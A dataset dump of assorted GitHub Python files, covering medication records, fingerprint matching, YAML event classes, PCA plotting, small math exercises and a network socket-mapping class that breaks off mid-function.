__ListaM=[]\r\n\r\n def __init__(self):\r\n self.__ListaM=[]\r\n\r\n\r\n def TestListaM (self):\r\n archivo2=open(\"medicamentos.csv\")\r\n reader=csv.reader(archivo2,delimiter=\";\")\r\n bandera=True\r\n for fila in reader:\r\n if(bandera):\r\n \"saltar cabecera\"\r\n bandera=not bandera\r\n else:\r\n idC2 = int(fila[0])\r\n idM= fila[1]\r\n nomC= fila[2]\r\n mono= fila[3]\r\n pres= fila[4]\r\n cant= fila[5]\r\n precio= fila[6]\r\n unMedicamento=Medicamentos(idC2, idM, nomC, mono, pres, cant, precio)\r\n self.__ListaM.append(unMedicamento)\r\n\r\n archivo2.close()\r\n\r\n def __str__(self):\r\n s=\"\"\r\n for lista in self.__ListaM:\r\n s+= str(lista) + \"\\n\"\r\n return s\r\n\r\n def mostrarM (self, indice):\r\n total=0\r\n print(\"Medicamento Presentacion Cantidad Precio\")\r\n for i in range (len(self.__ListaM)):\r\n if(self.__ListaM[i].getidCama2() == (indice+1)):\r\n total+=self.__ListaM[i].calculo()\r\n print(\"{} - {} - {} - {} \".format(self.__ListaM[i].getnom_comercial(),self.__ListaM[i].getpresentacion(),self.__ListaM[i].getcant_aplicada(),self.__ListaM[i].getprecio()))\r\n print(\"Total Adeudado: \",total)\r\n\r\n\r\n","repo_name":"SosaCristina/Practico-Integrador","sub_path":"ManejadorListaMedicamentos.py","file_name":"ManejadorListaMedicamentos.py","file_ext":"py","file_size_in_byte":1526,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"73693640236","text":"# Class build\r\nimport pickle\r\nimport json\r\nimport re\r\nimport os\r\nimport glob\r\nimport time\r\nimport operator\r\n\r\nimport numpy as np\r\n\r\nfrom libs.minutiae import minutiae_points, plot_minutiae, process_minutiae, generate_tuple_profile\r\nfrom libs.matching import match_tuples, evaluate\r\nfrom libs.edges import match_edge_descriptors\r\nfrom libs.basics import load_image\r\nfrom libs.enhancing import enhance_image\r\nfrom libs.edges import edge_processing, sift_match\r\n\r\n\r\nclass Image:\r\n \"\"\"\r\n Containing element for images - stores image array and its tuple profile.\r\n\r\n \"\"\"\r\n def __init__(self, img_id: str, path: str, image_raw: np.array, image_enhanced: np.array, profile: dict):\r\n self.img_id = img_id\r\n self.path = path\r\n self.image_raw = 
image_raw\r\n self.image_enhanced = image_enhanced\r\n self.minutiae = None\r\n self.profile = profile\r\n\r\n def plot(self):\r\n \"\"\"\r\n Plots minutiae from the stored image.\r\n\r\n \"\"\"\r\n\r\n plot_minutiae(self.image_enhanced, list(self.profile.keys()), size=8)\r\n\r\nclass NumpyEncoder(json.JSONEncoder):\r\n \"\"\" Special json encoder for numpy types \"\"\"\r\n def default(self, obj):\r\n if isinstance(obj, np.integer):\r\n return int(obj)\r\n elif isinstance(obj, np.floating):\r\n return float(obj)\r\n elif isinstance(obj, np.ndarray):\r\n return obj.tolist()\r\n return json.JSONEncoder.default(self, obj)\r\nclass FingerMatch:\r\n def __init__(self, model: str = 'tree', threshold: int = 125):\r\n self.images = []\r\n self.model = model\r\n self.threshold = threshold\r\n\r\n def loadData(self, path: str, image_format: str = 'tif', limit: int = None) -> None:\r\n \"\"\"\r\n Load data that matches the image_format, from the given path. Each image is processed and stored.\r\n\r\n \"\"\"\r\n\r\n # img_paths = [glob.glob(f'{path}/*.{image_format}', recursive=True)][0]\r\n img_paths = [path + '/' + f for f in os.listdir(path)]\r\n\r\n try:\r\n assert len(img_paths) > 0\r\n except:\r\n raise FileNotFoundError(f'ERROR: No image files available to extract from the path {path}')\r\n\r\n if limit is not None:\r\n # Restrict sample size.\r\n img_paths = img_paths[:limit]\r\n\r\n start = time.time()\r\n\r\n for p in img_paths:\r\n # Image loading\r\n image_raw = load_image(p, True)\r\n\r\n try:\r\n # Image properties definition.\r\n img_id = re.search(f'(.+?).{image_format}', os.path.basename(p)).group(1)\r\n except AttributeError:\r\n raise Exception(f'ERROR: Unknown image id for {p}')\r\n\r\n # Create new profile for the given image and store it.\r\n self.images.append(Image(img_id, p, image_raw, None, None))\r\n\r\n print(f'\\nINFO: Dataset loaded successfully. Duration: {round(time.time() - start, 2)} sec')\r\n\r\n def trainData(self):\r\n \"\"\"\r\n Loads model on the given dataset.\r\n\r\n \"\"\"\r\n\r\n start = time.time()\r\n print(f'INFO: Loading model features. 
Model: {self.model.lower()}')\r\n\r\n if self.model.lower() == 'tree':\r\n for i in range(len(self.images)):\r\n # Extract minutiae.\r\n try:\r\n self.images[i].image_enhanced = enhance_image(self.images[i].image_raw, skeletonise=True)\r\n minutiae = process_minutiae(self.images[i].image_enhanced)\r\n\r\n # Confirmed point matching.\r\n self.images[i].profile = generate_tuple_profile(minutiae)\r\n \r\n # Rewriting to the loaded data.\r\n self.images[i].minutiae = minutiae\r\n except:\r\n pass\r\n\r\n print(f'INFO: Training completed in {round(time.time() - start, 2)} sec')\r\n\r\n def save_as_pickle(self):\r\n with open(\"/home/tan/Documents/PythonProjects/AI/FingerMatch-20220508T085804Z-001/FingerMatch/src/dt.json\", \"wb\") as output:\r\n pickle.dump(self.images, output)\r\n\r\n def save_to_json(self):\r\n ar = []\r\n images = self.images\r\n for i in images:\r\n profileDict = {}\r\n for x, y in i.profile.items():\r\n profileDict[str(x)] = y\r\n i.profile = profileDict\r\n i.image_raw = None\r\n i.path = None\r\n i.image_enhanced = None\r\n i.minutiae = None\r\n # print(json.dumps(i.__dict__, cls=NumpyEncoder))\r\n ar.append(json.dumps(i.__dict__, cls=NumpyEncoder))\r\n with open(\"/home/tan/Documents/PythonProjects/AI/FingerMatch-20220508T085804Z-001/FingerMatch/src/dt.json\", \"w\") as op:\r\n json.dump(ar, op)\r\n\r\n def load_from_pickle(self):\r\n with open(\"/home/hoangdo/Documents/python/fingerprint-recognition/FingerMatch/src/data.json\", \"rb\") as f:\r\n self.images = pickle.load(f)\r\n\r\n def load_from_json(self):\r\n with open(\"/home/tan/Documents/PythonProjects/AI/FingerMatch-20220508T085804Z-001/FingerMatch/src/dt.json\", \"r\") as f:\r\n images = json.load(f)\r\n minutiae = []\r\n for i in images:\r\n profileDict = {}\r\n img = json.loads(i)\r\n for x, y in img[\"profile\"].items():\r\n profileDict[tuple(x)] = y\r\n minutiae.append(tuple(x))\r\n img[\"profile\"] = profileDict\r\n img[\"minutiae\"] = minutiae\r\n self.images.append(img)\r\n\r\n def matchFingerprint(self, image: np.array, verbose: bool = False, match_th: int = 33):\r\n \"\"\"\r\n The given image is compared against the loaded templates.\r\n A similarity score is computed and used to determine the most likely match, if any.\r\n\r\n \"\"\"\r\n if self.model.lower() == 'tree':\r\n\r\n img_test = enhance_image(image, skeletonise=True) # image input enhance\r\n\r\n minutiae_test = process_minutiae(img_test) ## all minutiae \r\n # Confirmed point matching.\r\n img_profile = generate_tuple_profile(minutiae_test) # all profile\r\n\r\n matchest_fingerprint = self.images[0]\r\n match_point = 0\r\n\r\n for i in range(len(self.images)):\r\n # Matching.\r\n # So diem minutiae trung nhau giua 2 anh\r\n common_points_base, common_points_test = match_tuples(self.images[i][\"profile\"], img_profile)\r\n\r\n # So diem minutiae max giua 2 anh(anh dau vao va anh dang truy van) \r\n minutiae_score = max(len(self.images[i][\"profile\"]), len(img_profile), 1)\r\n\r\n if len(common_points_base) / minutiae_score > match_point:\r\n match_point = len(common_points_base) / minutiae_score #So diem trung nhau cua anh dau vao va anh truy van / max\r\n matchest_fingerprint = self.images[i]\r\n\r\n print(f'Matching fingerprint is {matchest_fingerprint[\"img_id\"]} with points: 
{match_point}')\r\n","repo_name":"Manjushanair/fingerprint-recognition","sub_path":"FingerMatch/src/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":7067,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"42052196194","text":"#se busca saber el volumen de un cilindro\n\nprint('se busca calcular el volumen de un cilidro con el radio y altura')\n\nradio = float(input('Dame el radio del cilindro \\n'))\n\naltura = float(input('Dame la Altura del cilindro \\n'))\n\nvolumen = 3.1416 * (radio **2 )*altura\n\nprint(f'el volumen del cilindro es {volumen:.2f}')\n","repo_name":"Rito250693/compapl-2022","sub_path":"p12-volumen-cilindro.py","file_name":"p12-volumen-cilindro.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"1895268404","text":"# coding: utf-8\n\nfrom ruamel.yaml.compat import _F\n\n# Abstract classes.\n\nif False: # MYPY\n from typing import Any, Dict, Optional, List # NOQA\n\nSHOW_LINES = False\n\n\ndef CommentCheck():\n # type: () -> None\n pass\n\n\nclass Event:\n __slots__ = 'start_mark', 'end_mark', 'comment'\n\n def __init__(self, start_mark=None, end_mark=None, comment=CommentCheck):\n # type: (Any, Any, Any) -> None\n self.start_mark = start_mark\n self.end_mark = end_mark\n # assert comment is not CommentCheck\n if comment is CommentCheck:\n comment = None\n self.comment = comment\n\n def __repr__(self):\n # type: () -> Any\n if True:\n arguments = []\n if hasattr(self, 'value'):\n # if you use repr(getattr(self, 'value')) then flake8 complains about\n # abuse of getattr with a constant. When you change to self.value\n # then mypy throws an error\n arguments.append(repr(self.value)) # type: ignore\n for key in ['anchor', 'tag', 'implicit', 'flow_style', 'style']:\n v = getattr(self, key, None)\n if v is not None:\n arguments.append(_F('{key!s}={v!r}', key=key, v=v))\n if self.comment not in [None, CommentCheck]:\n arguments.append('comment={!r}'.format(self.comment))\n if SHOW_LINES:\n arguments.append(\n '({}:{}/{}:{})'.format(\n self.start_mark.line,\n self.start_mark.column,\n self.end_mark.line,\n self.end_mark.column,\n )\n )\n arguments = ', '.join(arguments) # type: ignore\n else:\n attributes = [\n key\n for key in ['anchor', 'tag', 'implicit', 'value', 'flow_style', 'style']\n if hasattr(self, key)\n ]\n arguments = ', '.join(\n [_F('{k!s}={attr!r}', k=key, attr=getattr(self, key)) for key in attributes]\n )\n if self.comment not in [None, CommentCheck]:\n arguments += ', comment={!r}'.format(self.comment)\n return _F(\n '{self_class_name!s}({arguments!s})',\n self_class_name=self.__class__.__name__,\n arguments=arguments,\n )\n\n\nclass NodeEvent(Event):\n __slots__ = ('anchor',)\n\n def __init__(self, anchor, start_mark=None, end_mark=None, comment=None):\n # type: (Any, Any, Any, Any) -> None\n Event.__init__(self, start_mark, end_mark, comment)\n self.anchor = anchor\n\n\nclass CollectionStartEvent(NodeEvent):\n __slots__ = 'tag', 'implicit', 'flow_style', 'nr_items'\n\n def __init__(\n self,\n anchor,\n tag,\n implicit,\n start_mark=None,\n end_mark=None,\n flow_style=None,\n comment=None,\n nr_items=None,\n ):\n # type: (Any, Any, Any, Any, Any, Any, Any, Optional[int]) -> None\n NodeEvent.__init__(self, anchor, start_mark, end_mark, comment)\n self.tag = tag\n self.implicit = implicit\n self.flow_style = flow_style\n self.nr_items = nr_items\n\n\nclass CollectionEndEvent(Event):\n 
__slots__ = ()\n\n\n# Implementations.\n\n\nclass StreamStartEvent(Event):\n __slots__ = ('encoding',)\n\n def __init__(self, start_mark=None, end_mark=None, encoding=None, comment=None):\n # type: (Any, Any, Any, Any) -> None\n Event.__init__(self, start_mark, end_mark, comment)\n self.encoding = encoding\n\n\nclass StreamEndEvent(Event):\n __slots__ = ()\n\n\nclass DocumentStartEvent(Event):\n __slots__ = 'explicit', 'version', 'tags'\n\n def __init__(\n self,\n start_mark=None,\n end_mark=None,\n explicit=None,\n version=None,\n tags=None,\n comment=None,\n ):\n # type: (Any, Any, Any, Any, Any, Any) -> None\n Event.__init__(self, start_mark, end_mark, comment)\n self.explicit = explicit\n self.version = version\n self.tags = tags\n\n\nclass DocumentEndEvent(Event):\n __slots__ = ('explicit',)\n\n def __init__(self, start_mark=None, end_mark=None, explicit=None, comment=None):\n # type: (Any, Any, Any, Any) -> None\n Event.__init__(self, start_mark, end_mark, comment)\n self.explicit = explicit\n\n\nclass AliasEvent(NodeEvent):\n __slots__ = 'style'\n\n def __init__(self, anchor, start_mark=None, end_mark=None, style=None, comment=None):\n # type: (Any, Any, Any, Any, Any) -> None\n NodeEvent.__init__(self, anchor, start_mark, end_mark, comment)\n self.style = style\n\n\nclass ScalarEvent(NodeEvent):\n __slots__ = 'tag', 'implicit', 'value', 'style'\n\n def __init__(\n self,\n anchor,\n tag,\n implicit,\n value,\n start_mark=None,\n end_mark=None,\n style=None,\n comment=None,\n ):\n # type: (Any, Any, Any, Any, Any, Any, Any, Any) -> None\n NodeEvent.__init__(self, anchor, start_mark, end_mark, comment)\n self.tag = tag\n self.implicit = implicit\n self.value = value\n self.style = style\n\n\nclass SequenceStartEvent(CollectionStartEvent):\n __slots__ = ()\n\n\nclass SequenceEndEvent(CollectionEndEvent):\n __slots__ = ()\n\n\nclass MappingStartEvent(CollectionStartEvent):\n __slots__ = ()\n\n\nclass MappingEndEvent(CollectionEndEvent):\n __slots__ = ()\n","repo_name":"spack/spack","sub_path":"lib/spack/external/_vendoring/ruamel/yaml/events.py","file_name":"events.py","file_ext":"py","file_size_in_byte":5496,"program_lang":"python","lang":"en","doc_type":"code","stars":3712,"dataset":"github-code","pt":"73"} +{"seq_id":"72740596396","text":"from LearnNSE import *\n\n# get the dataset in next time step\ndef get_next_dataset(df, batch, k, target_name):\n '''\n @df: data frame\n @batch: the number of training datasets you need\n @k: the kth time in the training and testing loop, where k > 0\n @target_name: the name of the target column\n '''\n # get sub-dataset of all dataset, which length equals to batch\n X_train = df[(k-1)*batch : (k)*batch]\n\n # X_train, y_train\n y_train = pd.DataFrame(X_train[target_name])\n X_train = X_train.drop(columns=target_name)\n\n return X_train, y_train\n\n############# Training Learn++.NSE #############\n# record\nrecord = []\n\n# number of run time\nRunTime = 10 # default=10\n\n# count the time length\ntime_length = len(df) # df is your dataframe\nbatch = int((1/RunTime)*time_length) # take 1/RunTime of all dataset\n\n# set a model\nLearnPPNSE = LearnNSE()\n\n# framework\nfor k in range(1,RunTime+1):\n # at least a model inside \n if k == 1:\n # get the dataset for training\n X_train, y_train = get_next_dataset(df=df, batch=batch, k=k, target_name='Label')\n # training model\n LearnPPNSE.fit(X_train, y_train)\n # re-compute voting weight\n LearnPPNSE.revoting(X_train, y_train)\n \n else:\n # get the dataset for training\n X_train, y_train = 
get_next_dataset(df=df, batch=batch, k=k, target_name='Label')\n # re-build the error distribution\n LearnPPNSE.redistribute_error_rate(X_train, y_train)\n # training model\n LearnPPNSE.fit(X_train, y_train)\n # re-compute voting weight\n LearnPPNSE.revoting(X_train, y_train)\n\n # testing & recording the score\n if k < RunTime:\n X_test, y_test = get_next_dataset(df=df, batch=batch, k=k+1, target_name='Label')\n score_B = LearnPPNSE.score(X_test, y_test)\n record.append(round(score, 3))\n################################################\n","repo_name":"chiachii/Learn.NSE-Algorithm","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1920,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"73"} +{"seq_id":"36939980314","text":"#!/usr/bin/env python3\nfrom mpl_toolkits.mplot3d import Axes3D\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nlib = np.load(\"pca.npz\")\ndata = lib[\"data\"]\nlabels = lib[\"labels\"]\n\ndata_means = np.mean(data, axis=0)\nnorm_data = data - data_means\n_, _, Vh = np.linalg.svd(norm_data)\npca_data = np.matmul(norm_data, Vh[:3].T)\n\n\n# Creating our Axes3D object using the \"projection=‘3d’ keyword\"\n# Like outlined at:\n# https://matplotlib.org/2.0.2/mpl_toolkits/mplot3d/tutorial.html\nfigure = plt.figure()\ngraph = figure.add_subplot(111, projection='3d')\n\n# The data we want to represent is the 3 dimensional data present in pca_data\n# So we're putting each of the columns of our pca_data array into variables\nU1 = pca_data[:, 0]\nU2 = pca_data[:, 1]\nU3 = pca_data[:, 2]\n\n# Scatters our data in our graph thanks to our U1, U2 an U3 coordinates\n# The argument c stands for color and we can pass it the whole labels array\n# directly thanks to the cmap argument\ngraph.scatter(U1, U2, U3, cmap=\"plasma\", c=labels, s=20)\n\n# Set labels and titles\ngraph.set_xlabel(\"U1\")\ngraph.set_ylabel(\"U2\")\ngraph.set_zlabel(\"U3\")\ngraph.set_title(\"PCA of Iris Dataset\")\n\n# Prints our graph\nplt.show()\n","repo_name":"OctaveC/holbertonschool-machine_learning","sub_path":"math/plotting/101-pca.py","file_name":"101-pca.py","file_ext":"py","file_size_in_byte":1178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"14770522848","text":"import math\nimport numpy as np\n\ndef mc_loren(num, iter):\n res = 0\n for i in range(1, iter):\n pre=(math.factorial(2 * i) * (num ** i)) / ((1 - 2 * i) * (math.factorial(i) ** 2) * (4 ** i))\n if i % 2 == 0:\n res += pre\n else:\n res -= pre\n return res\n\n\nclass MyNumber(object):\n def __init__(self, zeta):\n \"\"\"Конструктор принимает zeta, но обьект соответствует числу x=1+zeta.\"\"\"\n self.zeta=zeta\n def __str__(self):\n \"\"\"На экран выводится значение x, кото��ое может быть менее точно,\n чем храниемое значение.\"\"\"\n return \"{}\".format(self.to_float())\n def from_float(x):\n \"\"\"Создает число со значением, равным x.\"\"\"\n return MyNumber(x-1)\n def to_float(self):\n \"\"\"Преобразует число в формат с плавающей запятой\"\"\"\n return self.zeta+1\n def __mul__(self, other):\n \"\"\"Перезагрузка операции умножения.\"\"\"\n return MyNumber(self.zeta+other.zeta+self.zeta*other.zeta)\n def sqrt(self):\n if (self.zeta < 1):\n beta = mc_loren(self.zeta, 30)\n return MyNumber(beta)\n else:\n beta = math.sqrt(self.zeta+1)\n return MyNumber.from_float(beta)\n\ndef f_sqrt_sqr(x=MyNumber.from_float(np.pi), n=52):\n for k in range(n): x = x.sqrt()\n for k in range(n): x = x*x\n return 
x\n\nfloat_num = 2.44567\nprint(\"Число с плавающей запятой:\", float_num)\nnum = MyNumber.from_float(float_num)\nprint(\"Наше представление числа: \", num)\nprint(\"Квадрат в арифметике с плавающей запятой:\", float_num*float_num)\nprint(\"Квадрат в нашем представлении: \", num*num)\nn = 52\nprint(\"Число до преобразований: \", num)\nnew_num = f_sqrt_sqr(num)\nprint(\"Число после преобразований: \", new_num)\ndelta = num.to_float() - new_num.to_float()\neps = np.abs(delta) / num.to_float()\nprint(\"Разница: \", eps)","repo_name":"Karadarya/numerical_simulation_labs","sub_path":"lab1.py","file_name":"lab1.py","file_ext":"py","file_size_in_byte":2228,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"14449014206","text":"import math\r\nclass Complex(object):\r\n def __init__(self, real, imaginary):\r\n self.real=real\r\n self.imaginary=imaginary \r\n \r\n def __add__(self, no):\r\n real=self.real+no.real\r\n imaginary=self.imaginary+no.imaginary\r\n return(Complex(real,imaginary))\r\n\r\n \r\n def __sub__(self, no):\r\n real=self.real-no.real\r\n imaginary=self.imaginary-no.imaginary\r\n \r\n return(Complex(real,imaginary))\r\n \r\n def __mul__(self, no):\r\n real=self.real*no.real-self.imaginary*no.imaginary\r\n imaginary=self.real*no.imaginary+self.imaginary*no.real\r\n return(Complex(real,imaginary))\r\n \r\n\r\n def __truediv__(self, no):\r\n x=float(no.real**2+no.imaginary**2)\r\n y=self*Complex(no.real,-no.imaginary)\r\n real=y.real/x\r\n imaginary=y.imaginary/x\r\n return(Complex(real,imaginary))\r\n \r\n\r\n def mod(self):\r\n real=math.sqrt(self.real**2+self.imaginary**2)\r\n return(Complex(real,0))\r\n \r\n\r\n def __str__(self):\r\n if self.imaginary == 0:\r\n result = \"%.2f+0.00i\" % (self.real)\r\n elif self.real == 0:\r\n if self.imaginary >= 0:\r\n result = \"0.00+%.2fi\" % (self.imaginary)\r\n else:\r\n result = \"0.00-%.2fi\" % (abs(self.imaginary))\r\n elif self.imaginary > 0:\r\n result = \"%.2f+%.2fi\" % (self.real, self.imaginary)\r\n else:\r\n result = \"%.2f-%.2fi\" % (self.real, abs(self.imaginary))\r\n return result\r\n\r\n\r\nif __name__ == '__main__':\r\n c = map(float, input().split())\r\n d = map(float, input().split())\r\n x = Complex(*c)\r\n y = Complex(*d)\r\n print(*map(str, [x+y, x-y, x*y, x/y, x.mod(), y.mod()]), sep='\\n')\r\n","repo_name":"manishbisht/Competitive-Programming","sub_path":"Hackerrank/Practice/Python/11.Classes/75.Classes_ Dealing with Complex Numbers.py","file_name":"75.Classes_ Dealing with Complex Numbers.py","file_ext":"py","file_size_in_byte":1774,"program_lang":"python","lang":"en","doc_type":"code","stars":1369,"dataset":"github-code","pt":"73"} +{"seq_id":"19490310774","text":"# problem link : https://www.codetree.ai/missions/2/problems/best-place-of-33?&utm_source=clipboard&utm_medium=text\n\nn = int(input())\n\ngrid = [list(map(int, input().split())) for _ in range(n)]\n\ndef get_sum_of_gold(row_s, col_s, row_e, col_e):\n num_of_gold = 0\n\n for row in range(row_s, row_e + 1):\n for col in range(col_s, col_e + 1):\n num_of_gold += grid[row][col]\n\n return num_of_gold\n\nmax_gold = 0\n\nfor row in range(n):\n for col in range(n):\n if row + 2 >= n or col + 2 >= n:\n continue\n \n num_of_gold = get_sum_of_gold(row, col, row + 2, col + 2)\n\n max_gold = max(max_gold, num_of_gold)\n\nprint(max_gold)","repo_name":"jaesukpark77/Coding_Test_Study","sub_path":"codetree/INTERMEDIATE LOW/01. 
Simulation/격자 안에서 완전탐색/최고의 33위치.py","file_name":"최���의 33위치.py","file_ext":"py","file_size_in_byte":676,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"35892131316","text":"from PIL import Image\nfrom numpy import *\nfrom pylab import *\nimport os, sift, KNN\n\ndef ReadGestureFeaturesLabels(Path):\n FeatList=[os.path.join(Path,f) for f in os.listdir(Path) if f.endswith('.dsift')];\n Features=[];\n for FeatFile in FeatList:\n L,D=sift.ReadFeaturesFromFile(FeatFile);\n Features.append(D.flatten());\n Features=array(Features);\n\n Labels=[FeatFile.split('/')[-1][0] for FeatFile in FeatList];\n return Features,array(Labels);\n\ndef PrintConfusion(Res,Labels,ClassNames):\n\tN=len(ClassNames);\n\tClassIndex=dict([(ClassNames[i],i) for i in range(N)]);\n\tConfuse=zeros((N,N));\n\tfor i in range(len(TestLabels)):\n\t\tConfuse[ClassIndex[Res[i]],ClassIndex[TestLabels[i]]]+=1;\n\n\tprint('Confusion Matrix For');\n\tprint(ClassNames);\n\tprint(Confuse);\n\nFeatures,Labels=ReadGestureFeaturesLabels('../ActiveTest/gesture/train');\nTestFeatures,TestLabels=ReadGestureFeaturesLabels('../ActiveTest/gesture/test/');\n\nClassNames=unique(Labels);\n\nK=1;\nKNNClassifier=KNN.KNNClassifier(Labels,Features);\nRes=array([KNNClassifier.Classify(TestFeatures[i],K) for i in range(len(TestLabels))]);\n\nAcc=sum(1.0*(Res==TestLabels))/len(TestLabels);\nprint('Accuracy:',Acc);\n\nPrintConfusion(Res,Labels,ClassNames);\n","repo_name":"paul2705/pythonCV","sub_path":"ImgProc/ImgKNN.py","file_name":"ImgKNN.py","file_ext":"py","file_size_in_byte":1224,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"27958936487","text":"#\n# @lc app=leetcode.cn id=16 lang=python3\n#\n# [16] 最接近的三数之和\n#\n# https://leetcode-cn.com/problems/3sum-closest/description/\n#\n# algorithms\n# Medium (42.85%)\n# Likes: 365\n# Dislikes: 0\n# Total Accepted: 74.7K\n# Total Submissions: 173.7K\n# Testcase Example: '[-1,2,1,-4]\\n1'\n#\n# 给定一个包括 n 个整数的数组 nums 和 一个目标值 target。找出 nums 中的三个整数,使得它们的和与 target\n# 最接近。返回这三个数的和。假定每组输入只存在唯一答案。\n#\n# 例如,给定数组 nums = [-1,2,1,-4], 和 target = 1.\n#\n# 与 target 最接近的三个数的和为 2. 
(-1 + 2 + 1 = 2).\n#\n#\n#\n\n# @lc code=start\n\n\nclass Solution:\n def threeSumClosest(self, nums: List[int], target: int) -> int:\n if len(nums) < 3:\n return []\n nums.sort()\n i = 0\n head = 1\n tail = len(nums) - 1\n answer = 999999\n while 1:\n number = nums[i] + nums[head] + nums[tail]-target\n if number < 0:\n head += 1\n while nums[head] == nums[head - 1]and head < tail:\n head += 1\n elif number > 0:\n tail -= 1\n while nums[tail] == nums[tail + 1]and head < tail:\n tail -= 1\n else:\n return target\n answer = number+target if abs(\n answer-target) > abs(number) else answer\n if head >= tail:\n tem = i\n for j in range(i, len(nums)-2):\n if nums[i] != nums[j]:\n i = j\n head = i+1\n tail = len(nums) - 1\n break\n if tem == i:\n break\n return answer\n# @lc code=end\n","repo_name":"linitachi/LeetCode_Practice","sub_path":"medium/16.最接近的三数之和.py","file_name":"16.最接近的三数之和.py","file_ext":"py","file_size_in_byte":1829,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"73"} +{"seq_id":"43087469746","text":"import copy\nfrom ipaddress import ip_network, IPv4Address\nimport json\nimport logging\nimport re\nimport socket\nimport netifaces\nimport timeit\nimport traceback\nimport psutil\n\n__author__ = 'mffrench'\n\nLOGGER = logging.getLogger(__name__)\n\n\nclass MapSocket(object):\n\n cached_hostbyaddr = {}\n\n def __init__(self, source_ip=None, source_port=None, source_endpoint_id=None,\n destination_ip=None, destination_port=None, destination_osi_id=None,\n destination_subnet_id=None, destination_routing_area_id=None, destination_location_id=None,\n destination_endpoint_id=None, destination_node_id=None, destination_container_id=None,\n family=None, rtype=None, status=None, link_id=None, transport_id=None, file_descriptors=None):\n self.source_ip = source_ip\n self.source_port = source_port\n self.source_endpoint_id = source_endpoint_id\n\n self.destination_ip = destination_ip\n self.destination_port = destination_port\n self.destination_osi_id = destination_osi_id\n self.destination_subnet_id = destination_subnet_id\n self.destination_routing_area_id = destination_routing_area_id\n self.destination_location_id = destination_location_id\n self.destination_endpoint_id = destination_endpoint_id\n self.destination_node_id = destination_node_id\n self.destination_container_id = destination_container_id\n\n self.file_descriptors = file_descriptors if file_descriptors is not None else []\n self.status = status\n self.family = family\n self.type = rtype\n self.link_id = link_id\n self.transport_id = transport_id\n\n def __str__(self):\n return json.dumps(self.to_json())\n\n __repr__ = __str__\n\n def __eq__(self, other):\n if self.family != other.family or self.type != other.type or self.source_ip != other.source_ip\\\n or self.source_port != other.source_port or self.destination_ip != other.destination_ip\\\n or self.destination_port != other.destination_port:\n return False\n else:\n return True\n\n @staticmethod\n def ipv6_2_ipv4(ipv6):\n ipv4 = ipv6\n if ipv6.startswith(\"::127\"):\n ipv4 = ipv6.split(\"::\")[1]\n elif ipv6.lower().startswith(\"::ffff:\"):\n ipv4 = ipv6.lower().split(\"::ffff:\")[1]\n elif ipv6 == \"::1\":\n ipv4 = \"127.0.0.1\"\n elif ipv6 == \"::\":\n ipv4 = \"0.0.0.0\"\n elif re.match(r\"::*\\.*\\.*\\.*\", ipv6.lower()):\n ipv4 = ipv6.split(\"::\")[1]\n return ipv4\n\n def transform_system_ipv6_to_ipv4(self):\n source_ip = self.source_ip\n destination_ip = self.destination_ip\n if self.family == \"AF_INET6\":\n if 
self.destination_ip is not None:\n destination_ip = MapSocket.ipv6_2_ipv4(self.destination_ip)\n if self.source_ip is not None:\n source_ip = MapSocket.ipv6_2_ipv4(self.source_ip)\n return source_ip, destination_ip\n\n def to_json(self):\n json_obj = {\n 'status': self.status,\n 'family': self.family,\n 'type': self.type,\n 'file_descriptors': self.file_descriptors,\n 'link_id': self.link_id,\n 'transport_id': self.transport_id,\n 'source_ip': self.source_ip,\n 'source_port': self.source_port,\n 'source_endpoint_id': self.source_endpoint_id,\n 'destination_ip': self.destination_ip,\n 'destination_port': self.destination_port,\n 'destination_osi_id': self.destination_osi_id,\n 'destination_subnet_id': self.destination_subnet_id,\n 'destination_routing_area_id': self.destination_routing_area_id,\n 'destination_location_id': self.destination_location_id,\n 'destination_endpoint_id': self.destination_endpoint_id,\n 'destination_node_id': self.destination_node_id,\n 'destination_container_id': self.destination_container_id\n }\n return json_obj\n\n @staticmethod\n def from_json(json_obj):\n return MapSocket(\n status=json_obj['status'],\n family=json_obj['family'],\n rtype=json_obj['type'],\n file_descriptors=json_obj['file_descriptors'],\n link_id=json_obj['link_id'],\n transport_id=json_obj['transport_id'],\n source_ip=json_obj['source_ip'],\n source_port=json_obj['source_port'],\n source_endpoint_id=json_obj['source_endpoint_id'],\n destination_ip=json_obj['destination_ip'],\n destination_port=json_obj['destination_port'],\n destination_osi_id=json_obj['destination_osi_id'],\n destination_subnet_id=json_obj['destination_subnet_id'],\n destination_routing_area_id=json_obj['destination_routing_area_id'],\n destination_location_id=json_obj['destination_location_id'],\n destination_endpoint_id=json_obj['destination_endpoint_id'],\n destination_node_id=json_obj['destination_node_id'],\n destination_container_id=json_obj['destination_container_id']\n )\n\n @staticmethod\n def type_2_string(mstype):\n if mstype == socket.SOCK_STREAM:\n return 'SOCK_STREAM'\n elif mstype == socket.SOCK_DGRAM:\n return 'SOCK_DGRAM'\n else:\n return mstype\n\n @staticmethod\n def family_2_string(family):\n if family == socket.AddressFamily.AF_INET:\n return 'AF_INET'\n elif family == socket.AddressFamily.AF_INET6:\n return 'AF_INET6'\n elif family == socket.AddressFamily.AF_UNIX:\n return 'AF_UNIX'\n else:\n return family\n\n @staticmethod\n def get_cached_hostbyaddr(host):\n ret = None\n in_cache = False\n if host in MapSocket.cached_hostbyaddr.keys():\n # update hostbyaddr cache every day\n if timeit.default_timer() - MapSocket.cached_hostbyaddr[host]['time'] > 3600*24:\n MapSocket.cached_hostbyaddr.pop(host)\n else:\n in_cache = True\n\n if in_cache:\n ret = MapSocket.cached_hostbyaddr[host]['hostbyaddr']\n else:\n try:\n ret 